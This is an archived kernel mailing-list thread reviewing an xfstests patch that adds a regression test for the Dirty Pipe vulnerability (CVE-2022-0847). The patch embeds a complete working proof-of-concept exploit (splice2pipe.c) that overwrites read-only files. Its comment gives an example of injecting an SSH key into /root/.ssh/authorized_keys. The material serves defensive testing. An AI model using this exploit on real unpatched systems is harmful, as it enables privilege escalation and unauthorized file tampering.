| Message ID | 20220321110341.1323882-3-zlang@redhat.com (mailing list archive) |
|---|---|
| State | New, archived |
| Headers | show |
| Series | xfstests: hexdump and CVE-2022-0847 | expand |
On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote: > diff --git a/tests/generic/999 b/tests/generic/999 > new file mode 100755 > index 00000000..2488e455 > --- /dev/null > +++ b/tests/generic/999 > @@ -0,0 +1,54 @@ > +#! /bin/bash > +# SPDX-License-Identifier: GPL-2.0 > +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. > +# > +# FS QA Test No. 999 > +# > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an > +# uninitialized "pipe_buffer.flags" variable, which fixed by: > +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") > +# > +. ./common/preamble > +_begin_fstest auto quick > + > +_cleanup() > +{ > + cd / > + rm -f $tmp.* > + rm -f $TEST_DIR/testfile.$seq > +} Just leave the test file lying around so this can use the default cleanup method. The test device is supposed to gather random cruft as tests run.... > + > +# real QA test starts here > +_supported_fs generic > +_require_test > +_require_user > +_require_chmod > +_require_test_program "splice2pipe" > + > +localfile=$TEST_DIR/testfile.$seq .... and remove the file here as part of test setup with: rm -f $localfile Otherwise looks fine. Cheers, Dave.
On Tue, Mar 22, 2022 at 04:35:55PM +1100, Dave Chinner wrote: > On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote: > > diff --git a/tests/generic/999 b/tests/generic/999 > > new file mode 100755 > > index 00000000..2488e455 > > --- /dev/null > > +++ b/tests/generic/999 > > @@ -0,0 +1,54 @@ > > +#! /bin/bash > > +# SPDX-License-Identifier: GPL-2.0 > > +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. > > +# > > +# FS QA Test No. 999 > > +# > > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an > > +# uninitialized "pipe_buffer.flags" variable, which fixed by: > > +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") > > +# > > +. ./common/preamble > > +_begin_fstest auto quick > > + > > +_cleanup() > > +{ > > + cd / > > + rm -f $tmp.* > > + rm -f $TEST_DIR/testfile.$seq > > +} > > Just leave the test file lying around so this can use the default > cleanup method. The test device is supposed to gather random > cruft as tests run.... Got that, I'll keep this file, and turn to use default _cleanup. > > > + > > +# real QA test starts here > > +_supported_fs generic > > +_require_test > > +_require_user > > +_require_chmod > > +_require_test_program "splice2pipe" > > + > > +localfile=$TEST_DIR/testfile.$seq > > .... and remove the file here as part of test setup with: > > rm -f $localfile Just curious, I've used xfs_io "-t" option to truncate $localfile before testing: $XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile Can that instead of the "rm -f $localfile" ? (As both patches need to change, I'd like to change the 1st patch's g/404 in next version patch together, if no objection) Thanks, Zorro > > Otherwise looks fine. > > Cheers, > > Dave. > -- > Dave Chinner > david@fromorbit.com >
On Tue, Mar 22, 2022 at 08:30:02PM +0800, Zorro Lang wrote: > On Tue, Mar 22, 2022 at 04:35:55PM +1100, Dave Chinner wrote: > > On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote: > > > diff --git a/tests/generic/999 b/tests/generic/999 > > > new file mode 100755 > > > index 00000000..2488e455 > > > --- /dev/null > > > +++ b/tests/generic/999 > > > @@ -0,0 +1,54 @@ > > > +#! /bin/bash > > > +# SPDX-License-Identifier: GPL-2.0 > > > +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. > > > +# > > > +# FS QA Test No. 999 > > > +# > > > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an > > > +# uninitialized "pipe_buffer.flags" variable, which fixed by: > > > +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") > > > +# > > > +. ./common/preamble > > > +_begin_fstest auto quick > > > + > > > +_cleanup() > > > +{ > > > + cd / > > > + rm -f $tmp.* > > > + rm -f $TEST_DIR/testfile.$seq > > > +} > > > > Just leave the test file lying around so this can use the default > > cleanup method. The test device is supposed to gather random > > cruft as tests run.... > > Got that, I'll keep this file, and turn to use default _cleanup. > > > > > > + > > > +# real QA test starts here > > > +_supported_fs generic > > > +_require_test > > > +_require_user > > > +_require_chmod > > > +_require_test_program "splice2pipe" > > > + > > > +localfile=$TEST_DIR/testfile.$seq > > > > .... and remove the file here as part of test setup with: > > > > rm -f $localfile > > Just curious, I've used xfs_io "-t" option to truncate $localfile before testing: > $XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile > > Can that instead of the "rm -f $localfile" ? Open-and-truncate isn't safe here because some other (buggy) test might run 'mkfifo $TEST_DIR/testfile.XXX' and now opening the pipe will hang fstests. It's ok for the scratch fs because you have to mkfs it, but as Dave said, the test fs slowly accumulates cruft over time. --D > (As both patches need to change, I'd like to change the 1st patch's g/404 in next > version patch together, if no objection) > > Thanks, > Zorro > > > > > Otherwise looks fine. > > > > Cheers, > > > > Dave. > > -- > > Dave Chinner > > david@fromorbit.com > > >
On Tue, Mar 22, 2022 at 08:52:44AM -0700, Darrick J. Wong wrote: > On Tue, Mar 22, 2022 at 08:30:02PM +0800, Zorro Lang wrote: > > On Tue, Mar 22, 2022 at 04:35:55PM +1100, Dave Chinner wrote: > > > On Mon, Mar 21, 2022 at 07:03:41PM +0800, Zorro Lang wrote: > > > > diff --git a/tests/generic/999 b/tests/generic/999 > > > > new file mode 100755 > > > > index 00000000..2488e455 > > > > --- /dev/null > > > > +++ b/tests/generic/999 > > > > @@ -0,0 +1,54 @@ > > > > +#! /bin/bash > > > > +# SPDX-License-Identifier: GPL-2.0 > > > > +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. > > > > +# > > > > +# FS QA Test No. 999 > > > > +# > > > > +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an > > > > +# uninitialized "pipe_buffer.flags" variable, which fixed by: > > > > +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") > > > > +# > > > > +. ./common/preamble > > > > +_begin_fstest auto quick > > > > + > > > > +_cleanup() > > > > +{ > > > > + cd / > > > > + rm -f $tmp.* > > > > + rm -f $TEST_DIR/testfile.$seq > > > > +} > > > > > > Just leave the test file lying around so this can use the default > > > cleanup method. The test device is supposed to gather random > > > cruft as tests run.... > > > > Got that, I'll keep this file, and turn to use default _cleanup. > > > > > > > > > + > > > > +# real QA test starts here > > > > +_supported_fs generic > > > > +_require_test > > > > +_require_user > > > > +_require_chmod > > > > +_require_test_program "splice2pipe" > > > > + > > > > +localfile=$TEST_DIR/testfile.$seq > > > > > > .... and remove the file here as part of test setup with: > > > > > > rm -f $localfile > > > > Just curious, I've used xfs_io "-t" option to truncate $localfile before testing: > > $XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile > > > > Can that instead of the "rm -f $localfile" ? > > Open-and-truncate isn't safe here because some other (buggy) test might > run 'mkfifo $TEST_DIR/testfile.XXX' and now opening the pipe will hang > fstests. It's ok for the scratch fs because you have to mkfs it, but as > Dave said, the test fs slowly accumulates cruft over time. Make sense, Thanks! I'll change that. Thanks, Zorro > > --D > > > (As both patches need to change, I'd like to change the 1st patch's g/404 in next > > version patch together, if no objection) > > > > Thanks, > > Zorro > > > > > > > > Otherwise looks fine. > > > > > > Cheers, > > > > > > Dave. > > > -- > > > Dave Chinner > > > david@fromorbit.com > > > > > >
diff --git a/.gitignore b/.gitignore index ca6ba5c4..cd80d3a2 100644 --- a/.gitignore +++ b/.gitignore @@ -125,6 +125,7 @@ tags /src/runas /src/seek_copy_test /src/seek_sanity_test +/src/splice2pipe /src/splice-test /src/stale_handle /src/stat_test diff --git a/src/Makefile b/src/Makefile index 4d9e02b7..16aad922 100644 --- a/src/Makefile +++ b/src/Makefile @@ -31,7 +31,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \ dio-invalidate-cache stat_test t_encrypted_d_revalidate \ attr_replace_test swapon mkswap t_attr_corruption t_open_tmpfiles \ fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \ - detached_mounts_propagation ext4_resize t_readdir_3 + detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \ btrfs_crc32c_forged_name.py diff --git a/src/splice2pipe.c b/src/splice2pipe.c new file mode 100644 index 00000000..bd33ff67 --- /dev/null +++ b/src/splice2pipe.c @@ -0,0 +1,158 @@ +/* SPDX-License-Identifier: GPL-2.0 */ +/* + * Copyright 2022 CM4all GmbH / IONOS SE + * + * author: Max Kellermann <max.kellermann@ionos.com> + * + * Proof-of-concept exploit for the Dirty Pipe + * vulnerability (CVE-2022-0847) caused by an uninitialized + * "pipe_buffer.flags" variable. It demonstrates how to overwrite any + * file contents in the page cache, even if the file is not permitted + * to be written, immutable or on a read-only mount. + * + * This exploit requires Linux 5.8 or later; the code path was made + * reachable by commit f6dd975583bd ("pipe: merge + * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was + * there before, it just provided an easy way to exploit it. + * + * There are two major limitations of this exploit: the offset cannot + * be on a page boundary (it needs to write one byte before the offset + * to add a reference to this page to the pipe), and the write cannot + * cross a page boundary. + * + * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' + * + * Further explanation: https://dirtypipe.cm4all.com/ + */ +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include <unistd.h> +#include <fcntl.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/stat.h> +#include <sys/user.h> + +/** + * Create a pipe where all "bufs" on the pipe_inode_info ring have the + * PIPE_BUF_FLAG_CAN_MERGE flag set. + */ +static void prepare_pipe(int p[2]) +{ + if (pipe(p)) { + perror("pipe failed"); + abort(); + } + + const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); + static char buffer[4096]; + + /* fill the pipe completely; each pipe_buffer will now have + the PIPE_BUF_FLAG_CAN_MERGE flag */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + write(p[1], buffer, n); + r -= n; + } + + /* drain the pipe, freeing all pipe_buffer instances (but + leaving the flags initialized) */ + for (unsigned r = pipe_size; r > 0;) { + unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; + read(p[0], buffer, n); + r -= n; + } + + /* the pipe is now empty, and if somebody adds a new + pipe_buffer without initializing its "flags", the buffer + will be mergeable */ +} + +int main(int argc, char **argv) +{ + if (argc != 4) { + fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); + return EXIT_FAILURE; + } + + /* dumb command-line argument parser */ + const char *const path = argv[1]; + loff_t offset = strtoul(argv[2], NULL, 0); + const char *const data = argv[3]; + const size_t data_size = strlen(data); + int page_size = sysconf(_SC_PAGESIZE); + if (page_size == -1) + page_size = 4096; + + if (offset % page_size == 0) { + fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); + return EXIT_FAILURE; + } + + const loff_t next_page = (offset | (page_size - 1)) + 1; + const loff_t end_offset = offset + (loff_t)data_size; + if (end_offset > next_page) { + fprintf(stderr, "Sorry, cannot write across a page boundary\n"); + return EXIT_FAILURE; + } + + /* open the input file and validate the specified offset */ + const int fd = open(path, O_RDONLY); // yes, read-only! :-) + if (fd < 0) { + perror("open failed"); + return EXIT_FAILURE; + } + + struct stat st; + if (fstat(fd, &st)) { + perror("stat failed"); + return EXIT_FAILURE; + } + + if (offset > st.st_size) { + fprintf(stderr, "Offset is not inside the file\n"); + return EXIT_FAILURE; + } + + if (end_offset > st.st_size) { + fprintf(stderr, "Sorry, cannot enlarge the file\n"); + return EXIT_FAILURE; + } + + /* create the pipe with all flags initialized with + PIPE_BUF_FLAG_CAN_MERGE */ + int p[2]; + prepare_pipe(p); + + /* splice one byte from before the specified offset into the + pipe; this will add a reference to the page cache, but + since copy_page_to_iter_pipe() does not initialize the + "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ + --offset; + ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); + if (nbytes < 0) { + perror("splice failed"); + return EXIT_FAILURE; + } + if (nbytes == 0) { + fprintf(stderr, "short splice\n"); + return EXIT_FAILURE; + } + + /* the following write will not create a new pipe_buffer, but + will instead write into the page cache, because of the + PIPE_BUF_FLAG_CAN_MERGE flag */ + nbytes = write(p[1], data, data_size); + if (nbytes < 0) { + perror("write failed"); + return EXIT_FAILURE; + } + if ((size_t)nbytes < data_size) { + fprintf(stderr, "short write\n"); + return EXIT_FAILURE; + } + + return EXIT_SUCCESS; +} diff --git a/tests/generic/999 b/tests/generic/999 new file mode 100755 index 00000000..2488e455 --- /dev/null +++ b/tests/generic/999 @@ -0,0 +1,54 @@ +#! /bin/bash +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2022 Red Hat, Inc. All Rights Reserved. +# +# FS QA Test No. 999 +# +# Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an +# uninitialized "pipe_buffer.flags" variable, which fixed by: +# 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer") +# +. ./common/preamble +_begin_fstest auto quick + +_cleanup() +{ + cd / + rm -f $tmp.* + rm -f $TEST_DIR/testfile.$seq +} + +# real QA test starts here +_supported_fs generic +_require_test +_require_user +_require_chmod +_require_test_program "splice2pipe" + +localfile=$TEST_DIR/testfile.$seq + +# Create a file with 4k 0xff data, then make sure unprivileged user has readonly +# permission on it +$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1 +chmod 0644 $localfile +# Test privileged user (xfstests generally run with root) +echo "Test privileged user:" +$here/src/splice2pipe $localfile 1 "AAAAAAAABBBBBBBB" +# Part of 0xff will be overwritten if there's CVE-2022-0847 bug +_hexdump $localfile + +# Create a file with 4k 0xff data, then make sure unprivileged user has readonly +# permission on it +$XFS_IO_PROG -f -t -c "pwrite 0 4k -S 0xff" $localfile >> $seqres.full 2>&1 +chmod 0644 $localfile +# Copy splice2pipe to a place which can be run by an unprivileged user (avoid +# something likes /root/xfstests/src/splice2pipe) +cp $here/src/splice2pipe $tmp.splice2pipe +# Test unprivileged user's privilege escalation +echo "Test unprivileged user:" +su ${qa_user} -c "$tmp.splice2pipe $localfile 1 AAAAAAAABBBBBBBB" +_hexdump $localfile + +# success, all done +status=0 +exit diff --git a/tests/generic/999.out b/tests/generic/999.out new file mode 100644 index 00000000..a142909b --- /dev/null +++ b/tests/generic/999.out @@ -0,0 +1,9 @@ +QA output created by 999 +Test privileged user: +000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >................< +* +001000 +Test unprivileged user: +000000 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff >................< +* +001000
Test for the Dirty Pipe vulnerability (CVE-2022-0847) caused by an uninitialized "pipe_buffer.flags" variable. The bug cause a file can be overwritten even if a user/process is not permitted to write it. It's fixed by 9d2231c5d74e ("lib/iov_iter: initialize "flags" in new pipe_buffer"). Cc: Max Kellermann <max.kellermann@ionos.com> Signed-off-by: Zorro Lang <zlang@redhat.com> --- .gitignore | 1 + src/Makefile | 2 +- src/splice2pipe.c | 158 ++++++++++++++++++++++++++++++++++++++++++ tests/generic/999 | 54 +++++++++++++++ tests/generic/999.out | 9 +++ 5 files changed, 223 insertions(+), 1 deletion(-) create mode 100644 src/splice2pipe.c create mode 100755 tests/generic/999 create mode 100644 tests/generic/999.out